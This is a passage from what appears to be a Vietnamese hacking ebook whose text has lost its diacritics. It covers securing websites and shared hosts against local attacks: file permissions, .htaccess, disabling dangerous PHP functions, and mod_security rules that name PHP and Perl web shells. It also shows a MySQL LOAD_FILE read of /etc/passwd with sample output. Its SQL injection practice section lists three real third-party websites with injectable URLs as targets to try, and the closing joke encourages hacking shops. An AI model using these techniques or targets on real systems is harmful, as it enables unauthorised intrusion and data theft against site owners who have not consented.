ii. Cai thin d liu nhp vo cng tt cng c kha nng loai bo tn cng. iii. Han ch ti a
quyn truy vn.
iii. Han ch ti a quyn truy vn.
iv. Thng xuyn kim tra, qut ng dng bng nhng cng c mi nht.
v. Dng l chn tt nht c th cho tng lp tng tac. Vi d nh: thit lp Password 2 hoc 3
lp cho link admin bng .htaccess
vi:
- M ha thng tin, cc ban c th m ha thng tin lai v vic ny se v hiu hoa c vic cc
thng tin quan trong cua ban bi anh cp
- CHMOD cho ung, cac bc sau y rt quan trong ban chng Local nn nghi cc ban
ch thc hin cho ung :
+ CHMOD th mc Public_html thnh 710 thay v 750 mc inh vic ny se gip ban bao v
c cu trc Website cua mnh.

Page 63
+ CHMOD th mc l 701 v c gng ng bao gi CHMOD 777, c mt s folder khng quan
trong, ban c th CHMOD 755 c th hin thi ung va y u mt s ni dung trong Folder
o .
- Ch th ny, mt s Server h tr CHMOD th mc c 101, nu Server cua ban h tr ci
ny th hy s dng n, v bin php CHMOD ny rt an toan, n ngay ca Owner cung khng
th xem c cu trc Folder ngay ca khi vo FTP.
- CHMOD File l 604 v nh rng ng bao gi l 666 nu c vic cn 666 th ban CHMOD
tam s dng luc o, sau o hy CHMOD lai ngay. i vi cc Server h tr CHMOD file 404
ban hy CHMOD nh vy.
- Khng mun ai dom ngo admincp cua ban, n gian la ban hay tt no i. C ch bao mt mi,
da vao c tinh CHMOD cua may chu linux nh sau:
Ban tao 2 file, 1 file m admincp, 1 file tt admincp.

Code file m t tn la on.php:
<?php

CHMOD('/home/hoiquantinhoc.com/public_html/m/r/n/2/admincp/index.php',0701);
?>

Code file tt t tn la off.php:
<?php

CHMOD('/home/hoiquantinhoc.com/public_html/m/r/n/2/admincp/index.php',0000);
?>

Nh vy, sau khi ban ng nhp vao admincp ban cn chay link n file on.php, co nh vy
admincp mi c m -->login vo. Sau khi xong phin lm vic, ban chay link n file
off.php, admincp t ng ong. Cch ny gip chng ta tit kim thi gian, khng cn phai log
vao Control Panel CHMOD th mc.
- Thay i cu trc, tn file mc inh c cha cc thng tin quan trong . Nu c th hy thay i
ca cu trc CSDL nu ban lam c .
- Cu hnh .htaccess cho chi Ip cua Admin truy cp vo admincp v admin phai dng SSH
connect v server chinh sa trn admincp.
- Nu k lng hn ban c th down file index cua admincp xung v delete file index ny trn
host i ! Khi nao xai th ban up file index nay ln xai ! xai xong delete i.
- Thit lp cac tng la truy cp Admin m khng s dng n CSDL, m ha User/Pass th
cng tt, ngoi ra c h thng kim tra tc v cua MOD, Admin ... nu quyn han xc nhn mi
c thc hin (ci ny Matrix s dng rt thanh cng) . Trn y la hng dn tng bc gip
cc ban c gng chng Local attack, du sao y cung chi la hng dn c ban, trong qu trnh
thc hin, cc ban nn linh ng hn mt cht, nu c thm tng g mi th hy cng nhau
thao lun. Hy vong bi vit se gip cc Admin bao mt tt hn din an cua mnh.

Tai liu tham khao thm:
http://hieupc.com/joomla/bao-mat-website-joomla/134-chong-tan-cong-sql-injection.html
Preventing SQL Injections (tc gia: Anthony Ferrara - J oomla Core Team, bi gc ting Anh)
SQL Injection Page 64
2. Ngn chn LocalHack:
Secure cho MySQL:
MySQL nh chung ta bit la mt DBMS rt ph bin ,chung quy chia ra lam 4 loai:
* MySQL Standard includes the standard storage engine, as well as the InnoDB storage engine, which is touted as a
transaction-safe, ACID-compliant database with some additional features over the standard version.
* MySQL Pro is the commercial version.
* MySQL Max includes the more technologically advanced features that are available during early access programs.
* MySQL Classic is the standard storage engine without the InnoDB engine. This is another commercial version.

i ngu phat trin MySQL v mun nng cao kha nng tin dng cua mySQL ma a thm
mt s function co nguy c tm tng i vi vn bao mt cua server.
Chng ta hn a nghe noi n hinh thc local hack qua mysql ?
Xem th mt vi d nh sau :
(gia inh attacker co mt mysql user c quyn tao ,chinh sa, thm xoa DB trn sever )
- Thc hin chui cu lnh:
use atttacker;
Create table readfile(text LONGTEXT);
Insert into readfile values(loadfile('/etc/passwd');

V kt qua l :
root:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:/sbin/nologin
daemon:2:2:daemon:/sbin:/sbin/nologin
adm:3:4:adm:/var/adm:/sbin/nologin
lp:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:/sbin/nologin
news:9:13:news:/etc/news:
uucp:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:11:0:operator:/root:/sbin/nologin
games:12:100:games:/usr/games:/sbin/nologin
gopher:13:30:gopher:/var/gopher:/sbin/nologin
ftp:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:99:99:Nobody:/:/sbin/nologin
vcsa:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:37:37::/var/lib/rpm:/sbin/nologin
netdump:34:34:Network Crash Dump user:/var/crash:/bin/bash

Mt s ban t hoi rng sao server c hardening cn thn ri ,php : safe_mod ON , set
open_basedir ,disable function t la ma vn local c? .Rt co th admin quan tri server a bo
qun , cha chm soc n anh chang mysql nay. Vy vn cua chung ta la tim ra cac nguy c
t tinh tin dng cua mysql, ng goc nhin cua customer (t trng hp ban quan tri mt
server cung cp shared host) xem ho co cn thit phai s dng cac chc nng o hay khng ,v
Attacker se lam gi khi ho co c mt mysql user ,sau o ta se trin khai giai phap han ch ,ngn
nga nguy c nay.
Ta hy xem xt qua cc function cua mysql . Vy trong cac function nay ,cai nao co nguy c bao
mt nht ?
Mysql c 3 hm c kha nng thao tc file l load_file() ,load data infile v dumpfile.
Trc tin hay xem qua ham load_file();

Page 65
Ham nay co cu phap nh sau :
LOAD_FILE(file_name)

Cng dng cua ham nay la oc va tra v gia tri cua file nh mt chui . Xem manual page cua
mysql ,ban se thy ham nay cn vai iu kin co th thc thi:
To use this function, the file must be located on the server host, you must specify the full pathname to the file, and
you must have the FILE privilege. The file must be readable by all and its size less than max_allowed_packet bytes.

Hy t minh di goc cua mt customer thu host bnh thng, khi ho mun thao tac file co
th xay ra 2 trng hp :
1 dung php or perl ,cgi ,asp manipulate
2 la dung Ftp chinh sa trc tip

Nh trn ta thy c th oc c file qua MySQL th account phai c quyn FILE privilege
v file mun oc phai c quyn read ( c phep oc ). Da vao o ta co 2 cach ngn chn
vic truy xut file tri php :
+chmod file: khng c quyn read nhm group v world, cch chmod ti hay p dng l 401 (
|r--|---|--x| ), thc hin chinh sa file ban nn thc hin trong Control Panel hoc qua FTP.
+cm FILE privilege cua tt ca cc user trong MySQL.

Vy thi File privilege hon ton khng cn thit cho mt user binh thng s dng . ngn
chn nguy c t ham load_file() ny ,ban n gian chi vic disable file privilege cua toan b
user trong mysql.
K n ta xem xt tip chc nng load data infile;
Ham nay co cu phap nh sau :
LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE 'file_name'
[REPLACE | IGNORE]
INTO TABLE tbl_name
[FIELDS
[TERMINATED BY 'string']
[[OPTIONALLY] ENCLOSED BY 'char']
[ESCAPED BY 'char']
]
[LINES
[STARTING BY 'string']
[TERMINATED BY 'string']
]
[IGNORE number LINES]
[(col_name,...)]

(bi vit nay gia inh ban a co kin thc v mysql , y ta khng ban n cu phap hay cach
dng hm)
Hm ny cung co cng dng tng t load_file() nhng run vi tc kha nhanh . Ngoai ra con
c thm t khoa "Local" .Trong trng hp t khoa local c thm vao query . Mysql se oc
file trn client v gi no v server. a s server hin nay u set trn localhost nn vic co hay
khng local cung khng quan trong lm .Hay xem s qua iu kin ham nay co th thi hanh :

For security reasons, when reading text files located on the server, the files must either reside in the database
directory or be readable by all. Also, to use LOAD DATA INFILE on server files, you must have the FILE
privilege.

Vn chic chia khoa vang File privilege, ban co th ngn chn c kha nng readfile t mysql.
Vic dumpfile him server nao cho phep nn ta khng ban ti.
Page 66
Kt lun :
Mysql l mt DBMS thc s manh me vi tinh tin dng va sc manh cua no nhng vi mt s
hm tin dng qua lai tr thanh mi nguy c tim tang cho attacker li dng . Hy vong sau bai
vit nho nho nay ,ban co th nng cao mc bao mt cua h thng .Cac thiu sot mong c moi
ngi gop y thn.
Secure cho Host:
Nh cac ban cung bit cac con php shell nh r57, c99 s d co th "hnh ha" cc ti khoan
hosting trn cung server u da vo cc hm "nhay cam" trong PHP. Vy vic u tin cn lm
v hiu ha cc con shell ny l tt nhng hm nhay cam o. Tt nhin ban cn nghin cu
nhng hm "nhay cam" trong cac con shell o la g.
tt nhng hm nhay cam o th cc ban nn PHP chay trn safe_mode (safe_mode = On),
sau o tin hanh disable cac ham nh:
system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open,
proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl,
curl_exec, parse_ini_file, show_source

Tuy nhin thng thng nu l nh cung cp hosting th cc ban thng cho PHP chay vi
suPHP d dng nhn dang cc account chay PHP process. Chnh v th m nhiu hacker c
th dung file php.ini bt cac ham o ln.

Vy cng vic tip theo l ta nn kha lun chc nng dung file php.ini. Cac ban c th kha
trong phn config suPHP. Ngoi ra cung co cach khac tuy vao mi ngi.

Ok, c th noi la xong 1 giai oan. Mt ci rt quan trong tip theo ta cn cp l Mod
Security, y la mt addon dng cho cpanel.

Phn ny chi nu v d c ban trong phn config Security Rule, ci ny kh t nhi, mi ngi c
cch config ring.
VD:
SecRule REQUEST_URI "/r57en\.php"
SecRule REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"

Trn y chi l kin ring trong vn chng hack local bng shell PHP, tam ngt phn ny v
mt vn khng th qun v bo qua l cc con shell chay bng Perl nh cgitelnet.pl,
WebShell.cgi, ... Trong vn hack local th cc con shell chay bng Perl khng thua km g
PHP shell, c th ni l rt li hai.
Nh bai vit a trao i trn thi nu ban khng mun dung Perl na thi ban remove no i.
login as root
apt-get remove perl

Page 67

Cn nu nh ban mun chn khng cho Perl chay cac file cgi, pl trn 1 site nao o th ban chi
cn cu hinh file .conf cua website o

<Directory /home/websitecuaban/cgi-bin>
allow from all
</Directory>
Hng dn chng Symlink:
Symlink : Lin kt thng qua mt biu tng, tham chiu ti mt file hoc mt th mc. Tng
t nh tao shortcut trong Windows.
Ham nay c s dng trong thi gian va qua tin hanh attack local rt kho chng .
khc phc 1 phn tinh trang nay cac ban co th tin hanh chmod file v folder cua minh:
- Vi file chmod 404 ( r-----r-- )
- Vi folder chmod 701 ( rw------x )

Tin hanh tao file .htaccess vi ni dung:
<Files "config.php">

Order Deny,Allow
Deny from All
</Files>
Upload file nay vao folder /home/username/.htaccess co hiu lc cho toan website. Phn
<Files "config.php"> ban co th i lai tn cua file cn bao v.
Vi root cua server ban nn chmod 700 vi file symlink trong /bin/symlink. Tin hanh set
safe_mode=ON v disable mt s ham khng cn thit trong file php.ini :
system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open,
proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl,
curl_exec, parse_ini_file, show_source,ini_set, ini_alter, symlink
S dng mod_security thm vo rule :
SecFilterSelective THE_REQUEST "cgitelnet"

SecFilter "a=login&p="
SecFilter "a=command&d=(.*)&c="
SecFilterSelective THE_REQUEST "\?a=(up|down)load&d="

Page 68
3. Thc tp SQL Injection:
Source website v database
http://www.4shared.com/file/54599762...ified=37fd68a6

Soft Acunectix
http://www.4shared.com/file/54601066...Acunectix.html

Hng dn install MS SQL 2000
http://www.4shared.com/file/54608235...ified=37fd68a6

Chun b :
Ci MS SQL 2000
Ci IIS
Allow Extensions ASP
Copy Visic Source ti th mc wwwroot
M source ra , tm th mc include , thay i file common.inc
Attach Database.
Chay th trang web trn localhost v khai thc n th xem sao.
Mt vai site hack th ne:
http://beertiger.com/index.php?act=News&id=12'
http://www.computersvietnam.com/index.php?act=News&id=12
http://www.golfnyc.com/golf/ecom_v2/ecom.php?cat=2765
---------------------------------------------THE END---------------------------------------------
Cam n c gia a on oc cun ebook nay, y co th la tm huyt cui cung cua Hieupc v th
loai Ebook Hacking, co le sau nay se vit v mt vn khac. Chi mong cac ban hiu c iu
ny: hack l chi hoc hoi, chia se kinh nghim ln nhau, nng cao kin thc, tht s cach hack
t xa n nay cung chi co vai dang ph bin nh trn chi quan trong la ban co chiu hoc hoi va
nng cao kin thc cua minh qua sach, bo v internetNhng bai vit nh trn chi la cn ban,
hay ap dng ly thuyt thanh thc t nhe cac ban (hack c nhiu shop nh share vi hieupc it
nha, hihi, ua thi y).
Xin vui long gi quyn tac gia: Hieupc nu ban co y inh copy/leech thng tin. Cam n nhiu.
Chm ngn cua Hieupc: Cho i c nhn lai nhiu hn, ng qua kht khe vi chinh ban
thn minh va lam nhiu iu tt t se gp lanh.
K t by gi Hieupc bt u n chay, a bt u c 3 hm ri, hy vong se co ich c mt
phn nao. Cun Ebook ti y la kt thuc. Chuc ban vui ve vi cuc sng.
---------------------------------------------THE END---------------------------------------------
TAC GIA: HIEUPC
Page 69

Ebook Hacking Credit Card Version

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Ebook Hacking Credit Card Version

Uploaded by

Copyright:

Available Formats

Ebook Hacking Credit Card

You might also like